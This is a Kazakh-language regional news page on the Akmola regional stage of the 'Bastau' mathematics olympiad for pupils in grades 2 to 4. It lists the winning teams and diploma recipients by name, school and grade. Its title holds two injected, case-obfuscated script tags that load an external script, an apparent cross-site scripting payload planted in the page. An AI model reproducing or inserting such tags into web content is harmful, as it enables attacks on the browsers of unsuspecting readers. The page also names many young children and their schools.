«Бастау» XVІI республикалық математикалық олимпиадасының облыстық кезеңінің қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.02.2024

Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығы 2024 жылғы 5-7 ақпан аралығында Сандықтау ауданының Сандықтау ауылында «Жас дәурен» жыл бойы балалар сауықтыру лагерінің базасында 2-4 сынып оқушыларына арналған «Бастау» XVІІ республикалық математикалық олимпиадасының облыстық кезеңі өткізілді.

         Олимпиаданың мақсаты - бастауыш сынып оқушыларының математикалық қабілеттері ерекше дамыған дарынды балаларды айқындау, қолдау, математикадан білімдерін тереңдету және кеңейту болып табылады.

         2-4 сынып оқушыларына арналған «Бастау» математикалық олимпиадасы - бастауыш сынып оқушыларына арналған білім беру-дамыту бағдарламасы. Олимпиада жеке және командалық сайыс болып табылады.

         Облыстық кезеңі 3 турдан тұрды:

1-тур - «Әу, баста!» (командалық, жазбаша тур).

2-тур - «Асық» (командалық, ауызша тур)

3-тур - «Бәйге» (жеке, ауызша тур)

Әр команданың құрамы үш адамнан тұрды: 2 сыныптан -1 оқушы, 3 сыныптан-1 оқушы, 4 сыныптан-1 оқушы.

Облыстық кезеңге 15 аудан мен Көкшетау, Степногорск және Қосшы қалаларынан 108 оқушы қатысты.

Олимпиаданың қорытындысы бойынша Командалық турдан:

1 орын Қосшы қаласының «Болашақ» командасы және Бұланды ауданының «Жұлдыз» командалары ие болды.

1) Алтынбек Ықылас - Қосшы қаласының ІТ мектеп-лицейінің 2-сынып оқушысы, «Болашақ» командасы;

  1. Жексенбіқызы Мерей - Қосшы қаласының №3 жалпы орта білім беретін мектебінің 3-сынып оқушысы, «Болашақ» командасы;
  2. Орманбек Сұлтан - Қосшы қаласының мектеп гимназиясының 4-сынып оқушысы, «Болашақ» командасы.
  3. Глухова Арина - Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 2-сынып оқушысы, «Жұлдыз» командасы;
  4. Пайзула Альнұр - Бұланды ауданы, Никольск ауылының бастауыш мектебінің 3-сынып оқушысы, «Жұлдыз» командасы;
  5. Шерер Ксения - Бұланды ауданы, Макинск қаласының мектеп-гимназиясының 4-сынып оқушысы, «Жұлдыз» командасы;

2 орын - Кокшетау қаласының Көкшетау қаласының қазақ командасы:

  1. Тендеш Айлин - Көкшетау қаласының М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 2-сынып оқушысы, «Көкшетау қаласының командасы» командасы;
  2. Жанбырбай Малика - Көкшетау қаласының М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 3-сынып оқушысы, «Көкшетау қаласының командасы» командасы;
  3. Хариғазы Мұхамедияр - Көкшетау қаласының М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 4-сынып оқушысы, «Көкшетау қаласының командасы» командасы.

2 орын - Кокшетау қаласының Көкшетау қаласының орыс командасы:

  1. Сатыбаев Алиаскар - Көкшетау қаласының № 5 көппрофильді «Таңдау» гимназиясының 2-сынып оқушысы, «Көкшетау қаласының командасы» командасы;
  2. Сактаганов Темирлан - Көкшетау қаласының № 5 көппрофильді «Таңдау» гимназиясының 3-сынып оқушысы, «Көкшетау қаласының командасы» командасы;
  3. Сактаганов Хаким - Көкшетау қаласының № 5 көппрофильді «Таңдау» гимназиясының 4-сынып оқушысы, «Көкшетау қаласының командасы» командасы.

3 орын - Ақкөл ауданының «Болашақ» командасы:

  1. Шәмел Айша - Ақкөл ауданы, Кеңес ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы, «Болашақ» командасы;
  2. Туитина Айша - Ақкөл ауданы, Ақкөл қаласының Жайық Бектуров атындағы № 3 жалпы орта білім беретін мектебінің 3-сынып оқушысы, «Болашақ» командасы;
  3. Модин Бахытжан - Ақкөл ауданы, Ақкөл қаласының Жайық Бектуров атындағы № 3 жалпы орта білім беретін мектебінің 4-сынып оқушысы, «Болашақ» командасы.

3 орын - Зеренді ауданының «Знатоки» командасы марапатталды:

  1. Габдрахманов Тамир - Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 2-сынып оқушысы, «Знатоки» командасы;
  2. Антонова Алиса - Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 3-сынып оқушысы, «Знатоки» командасы;
  3. Рукавишников Артем - Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 4-сынып оқушысы, «Знатоки» командасы.

Сонымен қатар, Жеке турдан 28 оқушы жүлдегер және жеңімпаз атанды: І-дәрежелі дипломмен – 5 оқушы, ІІ-дәрежелі дипломмен – 8 оқушы, ІІІ-дәрежелі дипломмен – 15 оқушы, грамотамен – 9 оқушы марапатталды.

Ақмола облысының намысын «Бастау» XVІІ республикалық математикалық олимпиадасының қорытынды кезеңінде бірінші орын алған командалар қорғайтын болады.

І-дәрежелі дипломмен марапатталды:

  1. Отарбай Темірлан - Бұланды ауданы, Макинск қаласының Балуан Шолақ атындағы мектеп-лицейінің 2-сынып оқушысы;
  2. Абенов Батырхан - Ақкөл ауданы, Кеңес Одағының Батыры Петр Михайлович Исаков атындағы №1 Ақкөл жалпы білім беретін мектебінің 2-сынып оқушысы;
  3. Сактаганов Темирлан - Көкшетау қаласы, № 5 көппрофильді «Таңдау» гимназиясының 3-сынып оқушысы;
  4. Модин Бахытжан - Ақкөл ауданы, Ақкөл қаласының Жайық Бектуров атындағы № 3 жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  5. Афанасьева Полина - Степногорск қаласы, Л.Н.Толстой атындағы № 4 мектеп-гимназиясының 4-сынып оқушысы.

ІІ-дәрежелі дипломмен марапатталды:

  1. Сулеймен Асылым - Астрахан ауданы, Жаңатұрмыс ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  2. Айбекқызы Айсын - Целиноград ауданы, Қызылжар ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  3. Тюляев Демьян - Атбасар ауданы, Атбасар қаласының № 3 жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  4. Денисова Дарина - Степногорск қаласы, Л.Н.Толстой атындағы № 4 мектеп-гимназиясының 2-сынып оқушысы;
  5. Жаканова Назерке - Астрахан ауданы, Жаңатұрмыс ауылының жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  6. Хариғазы Мұхамедияр - Көкшетау қаласы, М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 4-сынып оқушысы;
  7. Алимбаев Арнұр - Қосшы қаласының №2 жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  8. Сактаганов Хаким - Көкшетау қаласы, № 5 көппрофильді «Таңдау» гимназиясының 4-сынып оқушысы.

ІІІ-дәрежелі дипломмен марапатталды:

  1. Шәмел Айша - Ақкөл ауданы, Кеңес ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  2. Батхаш Нұрдаулет - Біржан сал ауданы, Аңғал батыр ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  3. Тендеш Айлин - Көкшетау қаласы, М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 2-сынып оқушысы;
  4. Габдрахманов Тамир - Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  5. Сатыбаев Алиаскар - Көкшетау қаласы, № 5 көппрофильді «Таңдау» гимназиясының 2-сынып оқушысы;
  6. Жанбырбай Малика - Көкшетау қаласы, М.Ғабдуллин атындағы №3 көпсалалы гимназиясының 3-сынып оқушысы;
  7. Абишев Малик - Астрахан ауданы, Камышенка ауылының жалпы орта білім беретін мектебінің 3-сынып оқушысы;
  8. Зауров Юнус - Жақсы ауданы, Жақсы ауылының № 2 жалпы орта білім беретін мектебінің 3-сынып оқушысы;
  9. Қайың Имангали – Степногорск қаласы, К. Сәтпаев атындағы №9 жалпы орта білім беретін мектебінің 3-сынып оқушысы;
  10. Аманжол Бауыржан - Бұланды ауданы, Макинск қаласының мектеп-лицейінің 4-сынып оқушысы;
  11. Қуанышбек Досымбек - Сандықтау ауданы, Балкашин ауылының №1 жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  12. Орманбек Сұлтан - Қосшы қаласының мектеп гимназиясының 4-сынып оқушысы;
  13. Амиров Абусагит - Ақкөл ауданы, Домбыралы ауылының Горький атындағы жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  14. Уминский Артем - Астрахан ауданы, Камышенка ауылының жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  15. Кожабек Саян - Жақсы ауданы, Жақсы ауылының № 2 жалпы орта білім беретін мектебінің 4-сынып оқушысы.

Грамотамен марапатталды:

  1. Кенжебеков Батырхан - Аршалы ауданы, Жібек жолы ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  2. Қасымбай Альхаир - Аршалы ауданы, Жібек жолы ауылының жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  3. Туришева Надежда - Астрахан ауданы, Камышенка ауылының жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  4. Нұрсеит Ернұр - Жақсы ауданы, Жақсы ауылының № 1 жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  5. Идрисова Алма - Қорғалжын ауданы, Қорғалжын ауылының мектеп-гимназиясының 4-сынып оқушысы;
  6. Маусымкан Ертуған - Целиноград ауданы, Қызылжар ауылының жалпы орта білім беретін мектебінің 4-сынып оқушысы;
  7. Тураров Диас -  Степногорск қаласы,  К.Сатпаев атындағы  атындағы №9 жалпы орта білім беретін мектебінің 2-сынып оқушысы;
  8. Алтынбек Ықылас - Қосшы қаласының ІТ мектеп-лицейінің 2-сынып оқушысы;
  9. Балташ Мансұр - Қосшы қаласының мектеп гимназиясының 2-сынып оқушысы.

Жеңімпаздарды шын жүректен құттықтаймыз және жаңа жеңістер тілейміз!!!

Просмотров: 852


Пікір қосу



Деректерді қолтаңбаға қосу